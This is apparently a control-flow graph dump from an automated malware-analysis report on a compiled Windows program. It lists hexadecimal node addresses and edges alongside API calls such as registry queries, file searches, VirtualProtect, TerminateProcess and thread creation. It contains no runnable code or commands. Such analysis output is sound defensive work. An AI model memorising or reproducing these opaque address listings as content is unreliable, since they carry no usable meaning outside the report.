IsDialogMessageW 95923->95924 95925 13dd1d GetClassLongW 95923->95925 95924->95922 95924->95923 95925->95923 95925->95924 95926->94823 96291 cbd30 95927->96291 95929 d3267 95931 d32f8 95929->95931 95932 13907a 95929->95932 95997 d3628 95929->95997 96303 dc36b 86 API calls 95931->96303 96309 10cc5c 86 API calls 4 library calls 95932->96309 95935 1394df 95935->95997 96326 10cc5c 86 API calls 4 library calls 95935->96326 95937 d34eb Mailbox ___crtGetEnvironmentStringsW 95939 dc3c3 48 API calls 95937->95939 95943 13909a 95937->95943 95945 13926d 95937->95945 95962 139438 95937->95962 95964 cfe30 335 API calls 95937->95964 95982 d351f 95937->95982 95985 df4ea 48 API calls 95937->95985 95988 139394 95937->95988 95992 1393c5 95937->95992 95937->95997 96305 cd9a0 53 API calls __cinit 95937->96305 96306 cd8c0 53 API calls 95937->96306 96307 dc2d6 48 API calls ___crtGetEnvironmentStringsW 95937->96307 96319 11cda2 82 API calls Mailbox 95937->96319 96320 1080e3 53 API calls 95937->96320 96321 cd764 55 API calls 95937->96321 96322 cdcae 50 API calls Mailbox 95937->96322 95938 d3313 95938->95935 95938->95937 95938->95997 96296 c2b7a 95938->96296 95939->95937 95947 cd645 53 API calls 95943->95947 95984 1391fa 95943->95984 95944 d33ce 95944->95937 95955 d3465 95944->95955 95956 13945e 95944->95956 96318 10cc5c 86 API calls 4 library calls 95945->96318 95946 cfe30 335 API calls 95949 139407 95946->95949 95950 13910c 95947->95950 95958 cd6e9 55 API calls 95949->95958 95949->95997 95952 139220 95950->95952 95953 139114 95950->95953 96315 c1caa 49 API calls 95952->96315 95965 139128 95953->95965 95973 139152 95953->95973 95961 df4ea 48 API calls 95955->95961 96324 10c942 50 API calls 95956->96324 95958->95962 95977 d346c 95961->95977 96323 10cc5c 86 API calls 4 library calls 95962->96323 95963 13923d 95967 139252 95963->95967 95968 13925e 95963->95968 95964->95937 96310 10cc5c 86 API calls 4 library calls 95965->96310 96316 10cc5c 86 API calls 4 library calls 95967->96316 96317 10cc5c 86 API calls 4 library calls 95968->96317 95975 139177 95973->95975 95978 139195 95973->95978 96311 11f320 335 API calls 95975->96311 95981 ce8d0 335 API calls 95977->95981 95977->95982 95979 13918b 95978->95979 96312 11f5ee 335 API calls 95978->96312 95979->95997 96313 dc2d6 48 API calls ___crtGetEnvironmentStringsW 95979->96313 95981->95937 95986 c6eed 48 API calls 95982->95986 95987 d3540 95982->95987 96314 10cc5c 86 API calls 4 library calls 95984->96314 95985->95937 95986->95987 95991 1394b0 95987->95991 95995 d3585 95987->95995 95987->95997 95990 df4ea 48 API calls 95988->95990 95990->95992 96325 cdcae 50 API calls Mailbox 95991->96325 95992->95946 95994 d3615 96304 cdcae 50 API calls Mailbox 95994->96304 95995->95935 95995->95994 95995->95997 95998 d3635 Mailbox 95997->95998 96308 10cc5c 86 API calls 4 library calls 95997->96308 95998->94823 95999->94778 96000->94770 96001->94775 96002->94823 96003->94823 96004->94817 96005->94817 96006->94817 96008 cfe50 96007->96008 96031 cfe7e 96007->96031 96009 df4ea 48 API calls 96008->96009 96009->96031 96010 d146e 96011 c6eed 48 API calls 96010->96011 96033 cffe1 96011->96033 96012 cd7f7 48 API calls 96012->96031 96014 d0509 96333 10cc5c 86 API calls 4 library calls 96014->96333 96015 df4ea 48 API calls 96015->96031 96018 13a922 96018->94823 96019 13a246 96024 c6eed 48 API calls 96019->96024 96020 d1473 96332 10cc5c 86 API calls 4 library calls 96020->96332 96023 c6eed 48 API calls 96023->96031 96024->96033 96025 13a873 96025->94823 96026 f97ed InterlockedDecrement 96026->96031 96027 13a30e 96027->96033 96330 f97ed InterlockedDecrement 96027->96330 96028 e0f0a 52 API calls __cinit 96028->96031 96030 13a973 96334 10cc5c 86 API calls 4 library calls 96030->96334 96031->96010 96031->96012 96031->96014 96031->96015 96031->96019 96031->96020 96031->96023 96031->96026 96031->96027 96031->96028 96031->96030 96031->96033 96034 d15b5 96031->96034 96328 d1820 335 API calls 2 library calls 96031->96328 96329 d1d10 59 API calls Mailbox 96031->96329 96033->94823 96331 10cc5c 86 API calls 4 library calls 96034->96331 96035 13a982 96036->94817 96037->94817 96038->94817 96039->95831 96040->95833 96041->95884 96042->95842 96043->95878 96044->95884 96045->95898 96046->95857 96047->95880 96048->95888 96049->95894 96050->95896 96051->95894 96052->95884 96053->95884 96054->95884 96055->95881 96056->95898 96057->95898 96058->95877 96059->95898 96060->95898 96061->95884 96157 106ca9 GetFileAttributesW 96062->96157 96066 10fa1c __ftell_nolock 96065->96066 96067 10fa44 96066->96067 96242 cd286 48 API calls 96066->96242 96161 c936c 96067->96161 96070 10fa5e 96071 10fa80 96070->96071 96072 10fb68 96070->96072 96082 10fb92 96070->96082 96073 c936c 81 API calls 96071->96073 96074 c41a9 136 API calls 96072->96074 96080 10fa8c _wcscpy _wcschr 96073->96080 96075 10fb79 96074->96075 96076 10fb8e 96075->96076 96078 c41a9 136 API calls 96075->96078 96077 c936c 81 API calls 96076->96077 96076->96082 96079 10fbc7 96077->96079 96078->96076 96081 e1dfc __wsplitpath 47 API calls 96079->96081 96085 10fab0 _wcscat _wcscpy 96080->96085 96088 10fade _wcscat 96080->96088 96090 10fbeb _wcscat _wcscpy 96081->96090 96082->95908 96083 c936c 81 API calls 96084 10fafc _wcscpy 96083->96084 96243 1072cb GetFileAttributesW 96084->96243 96086 c936c 81 API calls 96085->96086 96086->96088 96088->96083 96089 10fb1c __NMSG_WRITE 96089->96082 96091 c936c 81 API calls 96089->96091 96094 c936c 81 API calls 96090->96094 96107 c936c 81 API calls 96106->96107 96108 11702a 96107->96108 96109 cb470 91 API calls 96108->96109 96111 11703a 96109->96111 96110 11705f 96114 117063 96110->96114 96282 ccdb9 48 API calls 96110->96282 96111->96110 96112 cfe30 335 API calls 96111->96112 96112->96110 96114->95908 96115->95910 96117 11e868 96116->96117 96118 11e84e 96116->96118 96284 11ccdc 48 API calls 96117->96284 96283 10cc5c 86 API calls 4 library calls 96118->96283 96121 11e871 96122 cfe30 334 API calls 96121->96122 96123 11e8cf 96122->96123 96124 11e96a 96123->96124 96125 11e916 96123->96125 96149 11e860 Mailbox 96123->96149 96126 11e9c7 96124->96126 96127 11e978 96124->96127 96285 109b72 48 API calls 96125->96285 96133 c936c 81 API calls 96126->96133 96126->96149 96286 10a69d 48 API calls 96127->96286 96130 11e949 96132 d45e0 334 API calls 96130->96132 96131 11e99b 96287 cbc74 48 API calls 96131->96287 96132->96149 96135 11e9e1 96133->96135 96136 cbdfa 48 API calls 96135->96136 96138 11ea05 CharUpperBuffW 96136->96138 96137 11e9a3 Mailbox 96140 d3200 334 API calls 96137->96140 96139 11ea1f 96138->96139 96141 11ea72 96139->96141 96142 11ea26 96139->96142 96140->96149 96143 c936c 81 API calls 96141->96143 96288 109b72 48 API calls 96142->96288 96144 11ea7a 96143->96144 96289 c1caa 49 API calls 96144->96289 96147 11ea54 96149->95907 96156->95908 96158 106529 96157->96158 96159 106cc4 FindFirstFileW 96157->96159 96158->95908 96159->96158 96160 106cd9 FindClose 96159->96160 96160->96158 96162 c9384 96161->96162 96176 c9380 96161->96176 96163 134cbd __i64tow 96162->96163 96164 c9398 96162->96164 96165 134bbf 96162->96165 96171 c93b0 __itow Mailbox _wcscpy 96162->96171 96245 e172b 80 API calls 4 library calls 96164->96245 96166 134ca5 96165->96166 96167 134bc8 96165->96167 96246 e172b 80 API calls 4 library calls 96166->96246 96167->96171 96172 134be7 96167->96172 96170 df4ea 48 API calls 96173 c93ba 96170->96173 96171->96170 96174 df4ea 48 API calls 96172->96174 96175 cce19 48 API calls 96173->96175 96173->96176 96178 134c04 96174->96178 96175->96176 96176->96070 96177 df4ea 48 API calls 96179 134c2a 96177->96179 96178->96177 96179->96176 96180 cce19 48 API calls 96179->96180 96180->96176 96242->96067 96243->96089 96245->96171 96246->96171 96282->96114 96283->96149 96284->96121 96285->96130 96286->96131 96287->96137 96288->96147 96292 cbd3f 96291->96292 96295 cbd5a 96291->96295 96293 cbdfa 48 API calls 96292->96293 96294 cbd47 CharUpperBuffW 96293->96294 96294->96295 96295->95929 96297 c2b8b 96296->96297 96298 13436a 96296->96298 96299 df4ea 48 API calls 96297->96299 96300 c2b92 96299->96300 96301 c2bb3 96300->96301 96327 c2bce 48 API calls 96300->96327 96301->95944 96303->95938 96304->95997 96305->95937 96306->95937 96307->95937 96308->95998 96309->95938 96310->95997 96311->95979 96312->95979 96313->95984 96314->95997 96315->95963 96316->95997 96317->95997 96318->95997 96319->95937 96320->95937 96321->95937 96322->95937 96323->95997 96324->95982 96325->95935 96326->95997 96327->96301 96328->96031 96329->96031 96330->96033 96331->96033 96332->96025 96333->96018 96334->96035 96336 c513f __NMSG_WRITE 96335->96336 96337 131b27 96336->96337 96338 c5151 96336->96338 96339 c6b4a 48 API calls 96337->96339 96340 cbb85 48 API calls 96338->96340 96342 131b34 96339->96342 96341 c515e ___crtGetEnvironmentStringsW 96340->96341 96341->94847 96343 dee75 48 API calls 96342->96343 96344 131b57 ___crtGetEnvironmentStringsW 96343->96344 96346 cb392 96345->96346 96353 cb3c5 ___crtGetEnvironmentStringsW 96345->96353 96346->96353 96353->94856 96354->94857 96355 139c06 96366 dd3be 96355->96366 96357 139c1c 96358 139c91 Mailbox 96357->96358 96375 c1caa 49 API calls 96357->96375 96361 d3200 335 API calls 96358->96361 96360 139cc5 96364 13a7ab Mailbox 96360->96364 96377 10cc5c 86 API calls 4 library calls 96360->96377 96361->96360 96363 139c71 96363->96360 96376 10b171 48 API calls 96363->96376 96367 dd3dc 96366->96367 96368 dd3ca 96366->96368 96370 dd40b 96367->96370 96371 dd3e2 96367->96371 96378 cdcae 50 API calls Mailbox 96368->96378 96379 cdcae 50 API calls Mailbox 96370->96379 96372 df4ea 48 API calls 96371->96372 96374 dd3d4 96372->96374 96374->96357 96375->96363 96376->96358 96377->96364 96378->96374 96379->96374 96380 13197b 96385 ddd94 96380->96385 96384 13198a 96386 df4ea 48 API calls 96385->96386 96387 ddd9c 96386->96387 96388 dddb0 96387->96388 96393 ddf3d 96387->96393 96392 e0f0a 52 API calls __cinit 96388->96392 96392->96384 96394 ddf46 96393->96394 96396 ddda8 96393->96396 96425 e0f0a 52 API calls __cinit 96394->96425 96397 dddc0 96396->96397 96398 cd7f7 48 API calls 96397->96398 96399 dddd7 GetVersionExW 96398->96399 96400 c6a63 48 API calls 96399->96400 96401 dde1a 96400->96401 96426 ddfb4 96401->96426 96404 c6571 48 API calls 96412 dde2e 96404->96412 96406 1324c8 96408 ddea4 GetCurrentProcess 96439 ddf5f LoadLibraryA GetProcAddress 96408->96439 96410 ddf31 GetSystemInfo 96414 ddf0e 96410->96414 96411 ddee3 96433 de00c 96411->96433 96412->96406 96430 ddf77 96412->96430 96413 ddebb 96413->96410 96413->96411 96417 ddf1c FreeLibrary 96414->96417 96418 ddf21 96414->96418 96417->96418 96418->96388 96419 ddf29 GetSystemInfo 96421 ddf03 96419->96421 96420 ddef9 96436 ddff4 96420->96436 96421->96414 96424 ddf09 FreeLibrary 96421->96424 96424->96414 96425->96396 96427 ddfbd 96426->96427 96428 cb18b 48 API calls 96427->96428 96429 dde22 96428->96429 96429->96404 96440 ddf89 96430->96440 96444 de01e 96433->96444 96437 de00c 2 API calls 96436->96437 96438 ddf01 GetNativeSystemInfo 96437->96438 96438->96421 96439->96413 96441 ddea0 96440->96441 96442 ddf92 LoadLibraryA 96440->96442 96441->96408 96441->96413 96442->96441 96443 ddfa3 GetProcAddress 96442->96443 96443->96441 96445 ddef1 96444->96445 96446 de027 LoadLibraryA 96444->96446 96445->96419 96445->96420 96446->96445 96447 de038 GetProcAddress 96446->96447 96447->96445 96448 1319cb 96453 c2322 96448->96453 96450 1319d1 96486 e0f0a 52 API calls __cinit 96450->96486 96452 1319db 96454 c2344 96453->96454 96487 c26df 96454->96487 96459 cd7f7 48 API calls 96460 c2384 96459->96460 96461 cd7f7 48 API calls 96460->96461 96462 c238e 96461->96462 96463 cd7f7 48 API calls 96462->96463 96464 c2398 96463->96464 96465 cd7f7 48 API calls 96464->96465 96466 c23de 96465->96466 96467 cd7f7 48 API calls 96466->96467 96468 c24c1 96467->96468 96495 c263f 96468->96495 96472 c24f1 96473 cd7f7 48 API calls 96472->96473 96474 c24fb 96473->96474 96524 c2745 96474->96524 96476 c2546 96477 c2556 GetStdHandle 96476->96477 96478 c25b1 96477->96478 96479 13501d 96477->96479 96480 c25b7 CoInitialize 96478->96480 96479->96478 96481 135026 96479->96481 96480->96450 96531 1092d4 53 API calls 96481->96531 96483 13502d 96532 1099f9 CreateThread 96483->96532 96485 135039 CloseHandle 96485->96480 96486->96452 96533 c2854 96487->96533 96490 c6a63 48 API calls 96491 c234a 96490->96491 96492 c272e 96491->96492 96547 c27ec 6 API calls 96492->96547 96494 c237a 96494->96459 96496 cd7f7 48 API calls 96495->96496 96497 c264f 96496->96497 96498 cd7f7 48 API calls 96497->96498 96499 c2657 96498->96499 96548 c26a7 96499->96548 96502 c26a7 48 API calls 96503 c2667 96502->96503 96504 cd7f7 48 API calls 96503->96504 96505 c2672 96504->96505 96506 df4ea 48 API calls 96505->96506 96507 c24cb 96506->96507 96508 c22a4 96507->96508 96509 c22b2 96508->96509 96510 cd7f7 48 API calls 96509->96510 96511 c22bd 96510->96511 96512 cd7f7 48 API calls 96511->96512 96513 c22c8 96512->96513 96514 cd7f7 48 API calls 96513->96514 96515 c22d3 96514->96515 96516 cd7f7 48 API calls 96515->96516 96517 c22de 96516->96517 96518 c26a7 48 API calls 96517->96518 96519 c22e9 96518->96519 96520 df4ea 48 API calls 96519->96520 96521 c22f0 96520->96521 96522 131fe7 96521->96522 96523 c22f9 RegisterWindowMessageW 96521->96523 96523->96472 96525 c2755 96524->96525 96526 135f4d 96524->96526 96528 df4ea 48 API calls 96525->96528 96553 10c942 50 API calls 96526->96553 96530 c275d 96528->96530 96529 135f58 96530->96476 96531->96483 96532->96485 96554 1099df 54 API calls 96532->96554 96540 c2870 96533->96540 96536 c2870 48 API calls 96537 c2864 96536->96537 96538 cd7f7 48 API calls 96537->96538 96539 c2716 96538->96539 96539->96490 96541 cd7f7 48 API calls 96540->96541 96542 c287b 96541->96542 96543 cd7f7 48 API calls 96542->96543 96544 c2883 96543->96544 96545 cd7f7 48 API calls 96544->96545 96546 c285c 96545->96546 96546->96536 96547->96494 96549 cd7f7 48 API calls 96548->96549 96550 c26b0 96549->96550 96551 cd7f7 48 API calls 96550->96551 96552 c265f 96551->96552 96552->96502 96553->96529 96555 1319ba 96560 dc75a 96555->96560 96559 1319c9 96561 cd7f7 48 API calls 96560->96561 96562 dc7c8 96561->96562 96568 dd26c 96562->96568 96564 dc865 96566 dc881 96564->96566 96571 dd1fa 48 API calls ___crtGetEnvironmentStringsW 96564->96571 96567 e0f0a 52 API calls __cinit 96566->96567 96567->96559 96572 dd298 96568->96572 96571->96564 96573 dd28b 96572->96573 96574 dd2a5 96572->96574 96573->96564 96574->96573 96575 dd2ac RegOpenKeyExW 96574->96575 96575->96573 96576 dd2c6 RegQueryValueExW 96575->96576 96577 dd2fc RegCloseKey 96576->96577 96578 dd2e7 96576->96578 96577->96573 96578->96577 96579 138eb8 96583 10a635 96579->96583 96581 138ec3 96582 10a635 84 API calls 96581->96582 96582->96581 96584 10a66f 96583->96584 96589 10a642 96583->96589 96584->96581 96585 10a671 96595 dec4e 81 API calls 96585->96595 96587 10a676 96588 c936c 81 API calls 96587->96588 96590 10a67d 96588->96590 96589->96584 96589->96585 96589->96587 96592 10a669 96589->96592 96591 c510d 48 API calls 96590->96591 96591->96584 96594 d4525 61 API calls ___crtGetEnvironmentStringsW 96592->96594 96594->96584 96595->96587 96596 cf030 96599 d3b70 96596->96599 96598 cf03c 96600 d3bc8 96599->96600 96654 d42a5 96599->96654 96601 d3bef 96600->96601 96603 136fd1 96600->96603 96606 136f7e 96600->96606 96612 136f9b 96600->96612 96602 df4ea 48 API calls 96601->96602 96604 d3c18 96602->96604 96679 11ceca 335 API calls Mailbox 96603->96679 96607 df4ea 48 API calls 96604->96607 96606->96601 96608 136f87 96606->96608 96661 d3c2c __NMSG_WRITE ___crtGetEnvironmentStringsW 96607->96661 96676 11d552 335 API calls Mailbox 96608->96676 96609 136fbe 96678 10cc5c 86 API calls 4 library calls 96609->96678 96612->96609 96677 11da0e 335 API calls 2 library calls 96612->96677 96614 d42f2 96698 10cc5c 86 API calls 4 library calls 96614->96698 96616 1373b0 96616->96598 96617 137297 96687 10cc5c 86 API calls 4 library calls 96617->96687 96618 13737a 96697 10cc5c 86 API calls 4 library calls 96618->96697 96620 ddce0 53 API calls 96620->96661 96624 d40df 96688 10cc5c 86 API calls 4 library calls 96624->96688 96626 13707e 96680 10cc5c 86 API calls 4 library calls 96626->96680 96627 cd6e9 55 API calls 96627->96661 96630 cd645 53 API calls 96630->96661 96633 1372d2 96689 10cc5c 86 API calls 4 library calls 96633->96689 96635 137350 96695 10cc5c 86 API calls 4 library calls 96635->96695 96637 cfe30 335 API calls 96637->96661 96638 137363 96696 10cc5c 86 API calls 4 library calls 96638->96696 96640 1372e9 96690 10cc5c 86 API calls 4 library calls 96640->96690 96643 c6a63 48 API calls 96643->96661 96645 13714c 96684 11ccdc 48 API calls 96645->96684 96646 df4ea 48 API calls 96646->96661 96647 dc050 48 API calls 96647->96661 96649 13733f 96694 10cc5c 86 API calls 4 library calls 96649->96694 96650 d3f2b 96650->96598 96652 cd286 48 API calls 96652->96661 96691 10cc5c 86 API calls 4 library calls 96654->96691 96655 c6eed 48 API calls 96655->96661 96656 1371a1 96686 dc15c 48 API calls 96656->96686 96659 dee75 48 API calls 96659->96661 96661->96614 96661->96617 96661->96618 96661->96620 96661->96624 96661->96626 96661->96627 96661->96630 96661->96633 96661->96635 96661->96637 96661->96638 96661->96640 96661->96643 96661->96645 96661->96646 96661->96647 96661->96649 96661->96650 96661->96652 96661->96654 96661->96655 96661->96659 96662 1371e1 96661->96662 96671 cd9a0 53 API calls __cinit 96661->96671 96672 cd83d 53 API calls 96661->96672 96673 ccdb9 48 API calls 96661->96673 96674 dc15c 48 API calls 96661->96674 96675 dbecb 335 API calls 96661->96675 96681 cdcae 50 API calls Mailbox 96661->96681 96682 11ccdc 48 API calls 96661->96682 96683 10a1eb 50 API calls 96661->96683 96662->96650 96693 10cc5c 86 API calls 4 library calls 96662->96693 96663 13715f 96663->96656 96685 11ccdc 48 API calls 96663->96685 96665 1371ce 96666 dc050 48 API calls 96665->96666 96668 1371d6 96666->96668 96667 1371ab 96667->96654 96667->96665 96668->96662 96669 137313 96668->96669 96692 10cc5c 86 API calls 4 library calls 96669->96692 96671->96661 96672->96661 96673->96661 96674->96661 96675->96661 96676->96650 96677->96609 96678->96603 96679->96661 96680->96650 96681->96661 96682->96661 96683->96661 96684->96663 96685->96663 96686->96667 96687->96624 96688->96650 96689->96640 96690->96650 96691->96650 96692->96650 96693->96650 96694->96650 96695->96650 96696->96650 96697->96650 96698->96616 96699 cef80 96700 d3b70 335 API calls 96699->96700 96701 cef8c 96700->96701 96702 c3742 96703 c374b 96702->96703 96704 c37c8 96703->96704 96705 c3769 96703->96705 96742 c37c6 96703->96742 96707 c37ce 96704->96707 96708 131e00 96704->96708 96709 c382c PostQuitMessage 96705->96709 96710 c3776 96705->96710 96706 c37ab DefWindowProcW 96744 c37b9 96706->96744 96711 c37f6 SetTimer RegisterWindowMessageW 96707->96711 96712 c37d3 96707->96712 96757 c2ff6 16 API calls 96708->96757 96709->96744 96714 131e88 96710->96714 96715 c3781 96710->96715 96719 c381f CreatePopupMenu 96711->96719 96711->96744 96716 131da3 96712->96716 96717 c37da KillTimer 96712->96717 96762 104ddd 60 API calls _memset 96714->96762 96720 c3789 96715->96720 96721 c3836 96715->96721 96723 131da8 96716->96723 96724 131ddc MoveWindow 96716->96724 96754 c3847 Shell_NotifyIconW _memset 96717->96754 96718 131e27 96758 de312 335 API calls Mailbox 96718->96758 96719->96744 96727 c3794 96720->96727 96732 131e6d 96720->96732 96747 deb83 96721->96747 96729 131dcb SetFocus 96723->96729 96730 131dac 96723->96730 96724->96744 96733 c379f 96727->96733 96734 131e58 96727->96734 96729->96744 96730->96733 96736 131db5 96730->96736 96731 c37ed 96755 c390f DeleteObject DestroyWindow Mailbox 96731->96755 96732->96706 96761 fa5f3 48 API calls 96732->96761 96733->96706 96759 c3847 Shell_NotifyIconW _memset 96733->96759 96760 1055bd 70 API calls _memset 96734->96760 96735 131e9a 96735->96706 96735->96744 96756 c2ff6 16 API calls 96736->96756 96741 131e68 96741->96744 96742->96706 96745 131e4c 96746 c4ffc 67 API calls 96745->96746 96746->96742 96748 dec1c 96747->96748 96749 deb9a _memset 96747->96749 96748->96744 96750 c51af 50 API calls 96749->96750 96752 debc1 96750->96752 96751 dec05 KillTimer SetTimer 96751->96748 96752->96751 96753 133c7a Shell_NotifyIconW 96752->96753 96753->96751 96754->96731 96755->96744 96756->96744 96757->96718 96758->96733 96759->96745 96760->96741 96761->96742 96762->96735 96763 1319dd 96768 c4a30 96763->96768 96765 1319f1 96788 e0f0a 52 API calls __cinit 96765->96788 96767 1319fb 96769 c4a40 __ftell_nolock 96768->96769 96770 cd7f7 48 API calls 96769->96770 96771 c4af6 96770->96771 96772 c5374 50 API calls 96771->96772 96773 c4aff 96772->96773 96789 c363c 96773->96789 96776 c518c 48 API calls 96777 c4b18 96776->96777 96778 c64cf 48 API calls 96777->96778 96779 c4b29 96778->96779 96780 cd7f7 48 API calls 96779->96780 96781 c4b32 96780->96781 96795 c49fb 96781->96795 96783 c4b43 Mailbox 96783->96765 96784 c61a6 48 API calls 96787 c4b3d _wcscat Mailbox __NMSG_WRITE 96784->96787 96785 cce19 48 API calls 96785->96787 96786 c64cf 48 API calls 96786->96787 96787->96783 96787->96784 96787->96785 96787->96786 96788->96767 96790 c3649 __ftell_nolock 96789->96790 96809 c366c GetFullPathNameW 96790->96809 96792 c365a 96793 c6a63 48 API calls 96792->96793 96794 c3669 96793->96794 96794->96776 96811 cbcce 96795->96811 96798 c4a2b 96798->96787 96799 1341cc RegQueryValueExW 96800 134246 RegCloseKey 96799->96800 96801 1341e5 96799->96801 96802 df4ea 48 API calls 96801->96802 96803 1341fe 96802->96803 96804 c47b7 48 API calls 96803->96804 96805 134208 RegQueryValueExW 96804->96805 96806 134224 96805->96806 96807 13423b 96805->96807 96808 c6a63 48 API calls 96806->96808 96807->96800 96808->96807 96810 c368a 96809->96810 96810->96792 96812 cbce8 96811->96812 96813 c4a0a RegOpenKeyExW 96811->96813 96814 df4ea 48 API calls 96812->96814 96813->96798 96813->96799 96815 cbcf2 96814->96815 96816 dee75 48 API calls 96815->96816 96816->96813 96817 139bec 96851 d0ae0 Mailbox ___crtGetEnvironmentStringsW 96817->96851 96822 d0509 96912 10cc5c 86 API calls 4 library calls 96822->96912 96823 df4ea 48 API calls 96845 cfec8 96823->96845 96824 d146e 96828 c6eed 48 API calls 96824->96828 96827 d1473 96911 10cc5c 86 API calls 4 library calls 96827->96911 96846 cffe1 Mailbox 96828->96846 96830 13a922 96831 13a246 96835 c6eed 48 API calls 96831->96835 96834 c6eed 48 API calls 96834->96845 96835->96846 96836 13a873 96837 cd7f7 48 API calls 96837->96845 96838 f97ed InterlockedDecrement 96838->96845 96839 13a30e 96839->96846 96907 f97ed InterlockedDecrement 96839->96907 96840 cce19 48 API calls 96840->96851 96842 e0f0a 52 API calls __cinit 96842->96845 96843 13a973 96913 10cc5c 86 API calls 4 library calls 96843->96913 96845->96822 96845->96823 96845->96824 96845->96827 96845->96831 96845->96834 96845->96837 96845->96838 96845->96839 96845->96842 96845->96843 96845->96846 96848 d15b5 96845->96848 96904 d1820 335 API calls 2 library calls 96845->96904 96905 d1d10 59 API calls Mailbox 96845->96905 96847 13a982 96910 10cc5c 86 API calls 4 library calls 96848->96910 96849 11e822 335 API calls 96849->96851 96850 cfe30 335 API calls 96850->96851 96851->96840 96851->96845 96851->96846 96851->96849 96851->96850 96852 13a706 96851->96852 96854 d1526 Mailbox 96851->96854 96855 df4ea 48 API calls 96851->96855 96856 f97ed InterlockedDecrement 96851->96856 96857 116ff0 335 API calls 96851->96857 96860 120d1d 96851->96860 96863 120d09 96851->96863 96866 11f0ac 96851->96866 96898 10a6ef 96851->96898 96906 11ef61 82 API calls 2 library calls 96851->96906 96908 10cc5c 86 API calls 4 library calls 96852->96908 96909 10cc5c 86 API calls 4 library calls 96854->96909 96855->96851 96856->96851 96857->96851 96914 11f8ae 96860->96914 96862 120d2d 96862->96851 96864 11f8ae 129 API calls 96863->96864 96865 120d19 96864->96865 96865->96851 96867 cd7f7 48 API calls 96866->96867 96868 11f0c0 96867->96868 96869 cd7f7 48 API calls 96868->96869 96870 11f0c8 96869->96870 96871 cd7f7 48 API calls 96870->96871 96872 11f0d0 96871->96872 96873 c936c 81 API calls 96872->96873 96897 11f0de 96873->96897 96874 c6a63 48 API calls 96874->96897 96875 cc799 48 API calls 96875->96897 96876 11f2cc 96877 11f2f9 Mailbox 96876->96877 97016 c6b68 48 API calls 96876->97016 96877->96851 96878 11f2b3 96881 c518c 48 API calls 96878->96881 96880 11f2ce 96882 c518c 48 API calls 96880->96882 96884 11f2c0 96881->96884 96885 11f2dd 96882->96885 96883 c6eed 48 API calls 96883->96897 96887 c510d 48 API calls 96884->96887 96888 c510d 48 API calls 96885->96888 96886 cbdfa 48 API calls 96890 11f175 CharUpperBuffW 96886->96890 96887->96876 96888->96876 96889 cbdfa 48 API calls 96891 11f23a CharUpperBuffW 96889->96891 96892 cd645 53 API calls 96890->96892 97015 dd922 55 API calls 2 library calls 96891->97015 96892->96897 96894 c518c 48 API calls 96894->96897 96895 c936c 81 API calls 96895->96897 96896 c510d 48 API calls 96896->96897 96897->96874 96897->96875 96897->96876 96897->96877 96897->96878 96897->96880 96897->96883 96897->96886 96897->96889 96897->96894 96897->96895 96897->96896 96899 10a6fb 96898->96899 96900 df4ea 48 API calls 96899->96900 96901 10a709 96900->96901 96902 cd7f7 48 API calls 96901->96902 96903 10a717 96901->96903 96902->96903 96903->96851 96904->96845 96905->96845 96906->96851 96907->96846 96908->96854 96909->96846 96910->96846 96911->96836 96912->96830 96913->96847 96915 c936c 81 API calls 96914->96915 96916 11f8ea 96915->96916 96941 11f92c Mailbox 96916->96941 96950 120567 96916->96950 96918 11fb8b 96919 11fcfa 96918->96919 96924 11fb95 96918->96924 96998 120688 89 API calls Mailbox 96919->96998 96922 11fd07 96923 11fd13 96922->96923 96922->96924 96923->96941 96963 11f70a 96924->96963 96925 c936c 81 API calls 96943 11f984 Mailbox 96925->96943 96930 11fbc9 96977 ded18 96930->96977 96933 11fbe3 96996 10cc5c 86 API calls 4 library calls 96933->96996 96934 11fbfd 96935 dc050 48 API calls 96934->96935 96938 11fc14 96935->96938 96937 11fbee GetCurrentProcess TerminateProcess 96937->96934 96939 d1b90 48 API calls 96938->96939 96949 11fc3e 96938->96949 96942 11fc2d 96939->96942 96940 11fd65 96940->96941 96946 11fd7e FreeLibrary 96940->96946 96941->96862 96944 12040f 105 API calls 96942->96944 96943->96918 96943->96925 96943->96941 96943->96943 96994 1229e8 48 API calls ___crtGetEnvironmentStringsW 96943->96994 96995 11fda5 60 API calls 2 library calls 96943->96995 96944->96949 96945 d1b90 48 API calls 96945->96949 96946->96941 96949->96940 96949->96945 96981 12040f 96949->96981 96997 cdcae 50 API calls Mailbox 96949->96997 96951 cbdfa 48 API calls 96950->96951 96952 120582 CharLowerBuffW 96951->96952 96999 101f11 96952->96999 96956 cd7f7 48 API calls 96957 1205bb 96956->96957 97006 c69e9 48 API calls ___crtGetEnvironmentStringsW 96957->97006 96959 1205d2 96960 cb18b 48 API calls 96959->96960 96961 1205de Mailbox 96960->96961 96962 12061a Mailbox 96961->96962 97007 11fda5 60 API calls 2 library calls 96961->97007 96962->96943 96964 11f725 96963->96964 96968 11f77a 96963->96968 96965 df4ea 48 API calls 96964->96965 96967 11f747 96965->96967 96966 df4ea 48 API calls 96966->96967 96967->96966 96967->96968 96969 120828 96968->96969 96970 120a53 Mailbox 96969->96970 96973 12084b _strcat _wcscpy __NMSG_WRITE 96969->96973 96970->96930 96971 ccf93 58 API calls 96971->96973 96972 cd286 48 API calls 96972->96973 96973->96970 96973->96971 96973->96972 96974 c936c 81 API calls 96973->96974 96975 e395c 47 API calls __crtCompareStringA_stat 96973->96975 97010 108035 50 API calls __NMSG_WRITE 96973->97010 96974->96973 96975->96973 96978 ded2d 96977->96978 96979 dedc5 VirtualProtect 96978->96979 96980 ded93 96978->96980 96979->96980 96980->96933 96980->96934 96982 120427 96981->96982 96993 120443 96981->96993 96984 1204f8 96982->96984 96985 12042e 96982->96985 96986 12044f 96982->96986 96982->96993 96983 12051e 96983->96949 97014 109dc5 103 API calls 96984->97014 97011 107c56 50 API calls _strlen 96985->97011 97013 ccdb9 48 API calls 96986->97013 96987 e1c9d _free 47 API calls 96987->96983 96991 120438 97012 ccdb9 48 API calls 96991->97012 96993->96983 96993->96987 96994->96943 96995->96943 96996->96937 96997->96949 96998->96922 97000 101f3b __NMSG_WRITE 96999->97000 97001 101f79 97000->97001 97002 101f6f 97000->97002 97004 101ffa 97000->97004 97001->96956 97001->96961 97002->97001 97008 dd37a 60 API calls 97002->97008 97004->97001 97009 dd37a 60 API calls 97004->97009 97006->96959 97007->96962 97008->97002 97009->97004 97010->96973 97011->96991 97012->96993 97013->96993 97014->96993 97015->96897 97016->96877

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
